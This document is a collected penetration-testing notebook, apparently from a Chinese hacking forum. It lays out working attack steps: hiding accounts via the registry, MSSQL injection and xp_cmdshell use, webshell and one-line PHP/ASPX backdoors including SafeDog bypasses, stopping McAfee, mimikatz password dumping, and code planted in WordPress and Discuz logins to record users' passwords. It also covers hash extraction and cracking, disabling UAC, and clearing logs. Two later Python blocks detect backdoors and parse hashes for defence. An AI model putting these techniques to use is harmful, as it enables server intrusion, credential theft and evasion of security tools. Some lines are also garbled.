echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
sc config rasman start= auto
sc config remoteaccess start= auto
net start rasman
net start remoteaccess
Media
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

control userpasswords2    view users' passwords
Export an Access database directly as a shell; prerequisites: table a exists in the Access database, and you know the site's real path
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
141. When doing manual MSSQL injection, if you cannot write out of band, you mostly end up reading records one by one, which is exhausting. Here is one statement that reads out all the data:
Test 1:
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

Test 2:

create table dirs(paths varchar(100),paths1 varchar(100), id int)
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--

SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
Method for shutting down McAfee: // requires SYSTEM privileges; use at or psexec -s cmd.exe
You can upload .com files, such as nc.com, to get around McAfee's executable restriction;
net stop mcafeeframework
net stop mcshield
net stop mcafeeengineservice
net stop mctaskmanager
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
VNCDump.zip (4.76 KB, downloads: 1)
Online password cracking: http://tools88.com/safe/vnc.php
The VNC password can be obtained directly with vncdump, or by querying the Password value under [HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] from the DOS prompt
exec master..xp_cmdshell 'net user'( E0 {$ H% z3 d3 X& [& s) s
mssql执行命令。3 e+ g3 f9 l* w2 O* K4 L7 ^
获取mssql的密码hash查询/ O# ~' i5 T g( @5 O$ }% ~. I
select name,password from master.dbo.sysxlogins0 g3 ^4 ~9 [& B& d2 V
" _, B5 Z4 ]1 Y/ l
backup log dbName with NO_LOG;
$ Y+ ~1 S2 k3 t: S" q2 d' v! fbackup log dbName with TRUNCATE_ONLY;
* z/ H: X4 r% sDBCC SHRINKDATABASE(dbName);! Y% o# X9 x! L% z
mssql数据库压缩# s2 ]9 P5 [: d# Z% i U
1 X* H9 @+ h& G$ T1 F3 G! k" v
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK5 K: C7 b) A! ]
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
2 m, K Y' D1 Q" ?( S
* u- k* x) H2 n1 w j5 j% G# jbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'; q+ |2 [, e% y' ]/ j7 c5 w
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak* B, `$ c" R" [, M1 F. n
Discuz!NT 3.5 penetration notes:
(1) Visit site-address/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
(2) Open the rss.aspx file, copy <%@ Page Inherits="Discuz.Web.UI.RssPage" %> to a local backup, then replace it with <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
(3) Save.
(4) The one-line backdoor is at http://somesite.com.cn/tools/rss.aspx, password pass
d:\rar.exe a -r d:\1.rar d:\website\*
Recursively compress website
Note the path of rar.exe
<?php
$telok = "0${@eval($_POST[xxoo])}";
$username = "123456";
$userpwd = "123456";
$telhao = "123456";
$telinfo = "123456";
?>
A PHP one-line trojan inserted through an unfiltered config field
Dumping the database when the web and DB servers are separate
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
Constraints meant a full shell could not be written, only a one-liner; that is actually enough to do anything, it just is not intuitive or convenient, for example for dumping the database.
Here the client's expert mode (write your own code) is used.
ini_set('display_errors', 1);
set_time_limit(0);
error_reporting(E_ALL);
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
$i = 0;
$tmp = '';
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
    $i = $i+1;
    $tmp .= implode("::", $row)."\n";
    if(!($i%500)){ // write one file per 500 rows
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
        file_put_contents($filename,$tmp);
        $tmp = '';
    }
}
mysql_free_result($result);

// delete after downloading
ini_set('display_errors', 1);
error_reporting(E_ALL);
$i = 0;
while($i<32) {
    $i = $i+1;
    $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
    unlink($filename);
}
httprint: collect OS fingerprints
Scan all ports on 192.168.1.100:
nmap -PN -sT -sV -p0-65535 192.168.1.100
host -t ns www.owasp.org   identify the name servers, get DNS info
host -l www.owasp.org ns1.secure.net   try to request a zone transfer for owasp.org
Netcraft DNS search service, at http://searchdns.netcraft.com/?host

Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (free registration required)

MSN search: http://search.msn.com syntax: "ip:x.x.x.x" (without the quotes)

Webhosting info: http://whois.webhosting.info/ syntax: http://whois.webhosting.info/x.x.x.x

DNSstuff: http://www.dnsstuff.com/ (several services available)

http://net-square.com/msnpawn/index.shtml (requires installation)

tomDNS: http://www.tomdns.net/ (some services are still non-public)

SEOlogs.com: http://www.seologs.com/ip-domains.html (reverse IP/domain lookup)
set names gb2312;
Importing the database gave the error "Data too long for column 'username' at row 1". The cause was that Chinese characters were not supported.
MySQL password change
UPDATE mysql.user SET password=PASSWORD("newpass") WHERE user="mysqladmin";
update user set password=PASSWORD('antian365.com') where user='root';
flush privileges;
Advanced PHP one-line backdoors

Found many advanced PHP one-line trojans during intrusions. Recording them so they can be searched for and removed by keyword later.

1.
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
// China Chopper (caidao) one-liner

2.
$filename=$_GET['xbid'];
include ($filename);
// dangerous include: runs any file as PHP

3.
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
// renames (copies) any uploaded file

4.
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
// China Chopper (caidao) one-liner

5. include ($uid);
// dangerous include: runs any file as PHP, via POST
// one-liner embedded in a gif

6. Typical one-liners
Backdoor code:
<?php eval_r($_POST[sb])?>
Code:
<?php @eval_r($_POST[sb])?>
// error-tolerant version
Code:
<?php assert($_POST[sb]);?>
// execute PHP statements through the expert mode of the lanker one-liner client
Code:
<?$_POST['sa']($_POST['sb']);?>
Code:
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
Code:
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
// with this one, enter the following in the "config" field when setting up the connection in the caidao client:
Code:
<O>h=@eval_r($_POST[c]);</O>
Code:
<script language="php">@eval_r($_POST[sb])</script>
// one-liner that gets past the <? restriction
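The note above says these one-liners are worth recording so they can be searched for later. The following is an added example, not code from the original post: a small keyword scanner over PHP source that flags each construct in the list (eval/assert of request data, eval inside a string, preg_replace with /e, variable functions, character-by-character function names, include of a request-controlled variable, and the script-language trick). The rule names, the sample files and the minimal assignment tracking for include() are this example's own constructions.

```python
import re

# One regex per construct in the list above (names are this example's own).
RULES = [
    # eval/assert fed straight from a request superglobal: eval($_POST[sb])
    ("eval-of-request",
     re.compile(r"@?\b(eval|assert)\s*\(\s*@?\$_(POST|GET|REQUEST|COOKIE)\b")),
    # "0${@eval($_POST[xxoo])}": eval hidden inside a double-quoted string
    ("eval-in-string", re.compile(r"\$\{\s*@?eval\s*\(")),
    # preg_replace with the /e modifier runs the replacement as PHP code
    ("preg_replace-e",
     re.compile(r"\(\s*[\"']/[^\"']*/[a-zA-Z]*e[a-zA-Z]*[\"']\s*,\s*\$_(POST|GET|REQUEST)")),
    # variable function called with request data: $_POST['sa']($_POST['sb'])
    ("variable-function", re.compile(r"\$_(POST|GET|REQUEST)\[[^\]]*\]\s*\(")),
    # <script language="php"> gets past filters that only look for <?
    ("script-language-php",
     re.compile(r"<script\s+language\s*=\s*[\"']php[\"']", re.IGNORECASE)),
]
# Function name assembled one character at a time: "p"."r"."e"."g"...
CONCAT_NAME = re.compile(r"(?:[\"'][A-Za-z_][\"']\s*\.\s*){3,}[\"'][A-Za-z_][\"']")
# $var = $_GET[...] followed later by include($var)
TAINT_ASSIGN = re.compile(r"\$(\w+)\s*=\s*\$_(GET|POST|REQUEST|COOKIE)\b")
INCLUDE_VAR = re.compile(r"\b(include|require)(?:_once)?\s*\(?\s*\$(\w+)")


def scan_php(source: str) -> dict:
    """Return {rule_name: [line numbers]} for every suspicious construct found."""
    hits, tainted = {}, set()
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, rx in RULES:
            if rx.search(line):
                hits.setdefault(name, []).append(lineno)
        if CONCAT_NAME.search(line):
            hits.setdefault("concatenated-function-name", []).append(lineno)
        m = TAINT_ASSIGN.search(line)
        if m:
            tainted.add(m.group(1))          # remember request-controlled variables
        m = INCLUDE_VAR.search(line)
        if m and m.group(2) in tainted:
            hits.setdefault("include-of-request-data", []).append(lineno)
    return hits


# Constructed sample files: the first five reuse the constructs listed above,
# the last one is ordinary code that must not be flagged.
SAMPLES = {
    "config.php": '<?php\n$telok = "0${@eval($_POST[xxoo])}";\n$username = "123456";\n?>',
    "cache.php": '<?php\n$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";\n'
                 '$hh("/[discuz]/e",$_POST[\'h\'],"Access");',
    "view.php": "<?php\n$filename=$_GET['xbid'];\ninclude ($filename);",
    "up.php": '<?php\n$reg="c"."o"."p"."y";\n$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);',
    "x.php": "<?$_POST['sa']($_POST['sb']);?>",
    "clean.php": "<?php\n$name = preg_replace('/[^a-z]/', '', $_POST['name']);\necho $name;",
}


def scan_all(files: dict = SAMPLES) -> dict:
    """Scan every file and keep only those with at least one hit."""
    return {p: h for p, h in ((p, scan_php(s)) for p, s in files.items()) if h}
```

Run scan_all() over a web root's .php files; each hit names the construct and the line, so a reviewer can open the file at that point.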
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
Detailed usage:
1. Go to the tools directory. psexec \\127.0.0.1 cmd
2. Run mimikatz
3. Run privilege::debug
4. Run inject::process lsass.exe sekurlsa.dll
5. Run @getLogonPasswords
6. widget is the password
7. exit to quit; do not close the window directly or the system will crash.

http://www.monyer.com/demo/monyerjs/ fairly complete JS decoding site
Automatically check for high-risk system patches
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
One-line aspx backdoor that gets past SafeDog
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
Logging WordPress login passwords from a webshell
Logging WordPress login passwords from a webshell, handy for further social engineering
Add at line 539 of wp-login.php:
// log password
$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.'|'.$log_pwd.'|'.$log_ip;
$txt=$txt."\r\n";
if($log_user&&$log_pwd&&$log_ip){
    @fwrite(fopen('pwd.txt',"a+"),$txt);
}
The logging code is triggered when action=login; you can of course also put it in the default branch of the switch...case statement.
That is, search for case 'login'
and insert it directly below; the logged passwords are written to pwd.txt.
Actually, modifying wp-login.php is not a good approach, it is easy to spot; there are other ways, noting this for the record.
Using the IIS6 file-parsing vulnerability to get past SafeDog:
;antian365.asp;antian365.jpg
Grabbing hashes from various databases to crack the highest-privilege passwords!
1. SQL Server 2000
SELECT password from master.dbo.sysxlogins where name='sa'
0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD54D6119FFF04129A1D72E7C3194F7284A7F3A

0x0100 - constant header
34767D5C - salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341 - case sensitive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A - upper case hash
crack the upper case hash in 'cain and abel' and then work the case sensitive hash
SQL server 2005:-
SELECT password_hash FROM sys.sql_logins where name='sa'
0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0x0100 - constant header
993BF231 - salt
5F36CC441485B35C4D84687DC02C78B0E680411F - case sensitive hash
crack case sensitive hash in cain, try brute force and dictionary based attacks.

update:- following bernardo's comments:-
use function fn_varbintohexstr() to cast password in a hex string.
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password) from sysxlogins
MYSQL:-
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL's own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.

*mysql < 4.1

mysql> SELECT PASSWORD('mypass');
+--------------------+
| PASSWORD('mypass') |
+--------------------+
| 6f8c114b58f2ce9e   |
+--------------------+

*mysql >=4.1

mysql> SELECT PASSWORD('mypass');
+-------------------------------------------+
| PASSWORD('mypass')                        |
+-------------------------------------------+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+-------------------------------------------+

Select user, password from mysql.user
The hashes can be cracked in 'cain and abel'
Postgres:-
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called "postgres" or "pgsql")
select usename, passwd from pg_shadow;
 usename  | passwd
----------+-------------------------------------
 testuser | md5fabb6d7172aadfda4753bf0507ed4396
use mdcrack to crack these hashes:-
wine MDCrack-sse.exe --algorithm=MD5 --append=testuser fabb6d7172aadfda4753bf0507ed4396

Oracle:-
select name, password, spare4 from sys.user$
hashes could be cracked using 'cain and abel' or thc-orakelcrackert11g
More on Oracle later, i am a bit bored....
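As an added example (not code from the original post), the field layouts described above can be checked programmatically: the SQL Server 0x0100 blob is split into header, salt and SHA-1 hash(es), the MySQL 4.1+ PASSWORD() value is recomputed as '*' + SHA1(SHA1(pw)), and the pg_shadow value as 'md5' + md5(pw || user). The two SQL Server blobs are the ones quoted above; the SQL Server hashing rule used for the round-trip check (SHA-1 over the UTF-16LE password followed by the salt, once as typed and once upper-cased) comes from its public description, and the password in that check is constructed.

```python
import hashlib


def parse_mssql_hash(blob: str) -> dict:
    """Split a sysxlogins / sys.sql_logins password value into its fields."""
    h = blob.lower()
    if h.startswith("0x"):
        h = h[2:]
    if not h.startswith("0100") or len(h) not in (52, 92):
        raise ValueError("not a 0x0100 SQL Server password blob")
    salt = h[4:12]                      # 4-byte salt, 8 hex chars
    case_sensitive = h[12:52]           # SHA-1, 40 hex chars
    upper_case = h[52:92] if len(h) == 92 else None   # SQL 2000 only
    return {
        "version": "2000" if upper_case else "2005",
        "salt": salt,
        "case_sensitive": case_sensitive,
        "upper_case": upper_case,
    }


def mssql_hash(password: str, salt: bytes, upper: bool = False) -> str:
    """SHA-1 over UTF-16LE(password) || salt, as SQL Server stores it."""
    text = password.upper() if upper else password
    return hashlib.sha1(text.encode("utf-16-le") + salt).hexdigest()


def mssql_make_blob(password: str, salt: bytes, version: str = "2000") -> str:
    """Build a blob in the layout above (used here only for the round-trip check)."""
    blob = "0100" + salt.hex() + mssql_hash(password, salt)
    if version == "2000":
        blob += mssql_hash(password, salt, upper=True)
    return "0x" + blob.upper()


def mssql_check_password(password: str, blob: str) -> bool:
    """True if password matches the case-sensitive hash in blob (login audit)."""
    f = parse_mssql_hash(blob)
    return mssql_hash(password, bytes.fromhex(f["salt"])) == f["case_sensitive"]


def mysql41_password(password: str) -> str:
    """MySQL >= 4.1 PASSWORD(): '*' + upper(hex(SHA1(SHA1(password))))."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def postgres_md5(password: str, username: str) -> str:
    """pg_shadow format: 'md5' + hex(md5(password || username))."""
    return "md5" + hashlib.md5((password + username).encode()).hexdigest()
```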
Enabling xp_cmdshell in SQL Server 2005/2008
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
Clearing SQL Server 2008 logs; always back up before clearing.
If SQL Express 2008 is installed on Windows Server 2008 Standard, delete it here:
X:\Users\[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin

For versions before SQL Server 2008:
SQL Server 2005:
delete X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
SQL Server 2000:
clear the corresponding entries under the registry key HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\.

Last edited by simeon on 2013-1-3 09:51
Windows 2008 file permission modification
1. http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
2. http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
I. First check whether the right-click menu has "Take ownership as administrator"; if it does not,

Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"

Import the .reg above to add the Win7 right-click "Take ownership as administrator" entry
II. Search the C:\Windows directory for "notepad.exe"; you should find four "notepad.exe" and four "notepad.exe.mui",
1. The "notepad.exe" in C:\Windows does not need replacing
2. The "notepad.exe" in C:\Windows\System32 does not need replacing
3. Ignore the four "notepad.exe.mui"
4. Mainly replace the "notepad.exe" in the two folders C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4 and
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a
To replace: first take administrator ownership of these two folders, then rename "Notepad2.exe" to "notepad.exe" and copy it into both folders,
then go back to the desktop, create a new txt file and open it to see whether it has changed.
Disabling the security policy (UAC) in Windows 2008:
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Modify client.php in the uc_client directory: below
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
insert the code below; csslog.php is then generated automatically under the site's ./data/cache/ directory.
You can add a view.php under the ipdata directory to view the records; the password is falw
if(getenv('HTTP_CLIENT_IP')) {
    $onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
    $onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
    $onlineip = getenv('REMOTE_ADDR');
} else {
    $onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
$showtime=date("Y-m-d H:i:s");
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
$handle=fopen('./data/cache/csslog.php','a+');
$write=fwrite($handle,$record);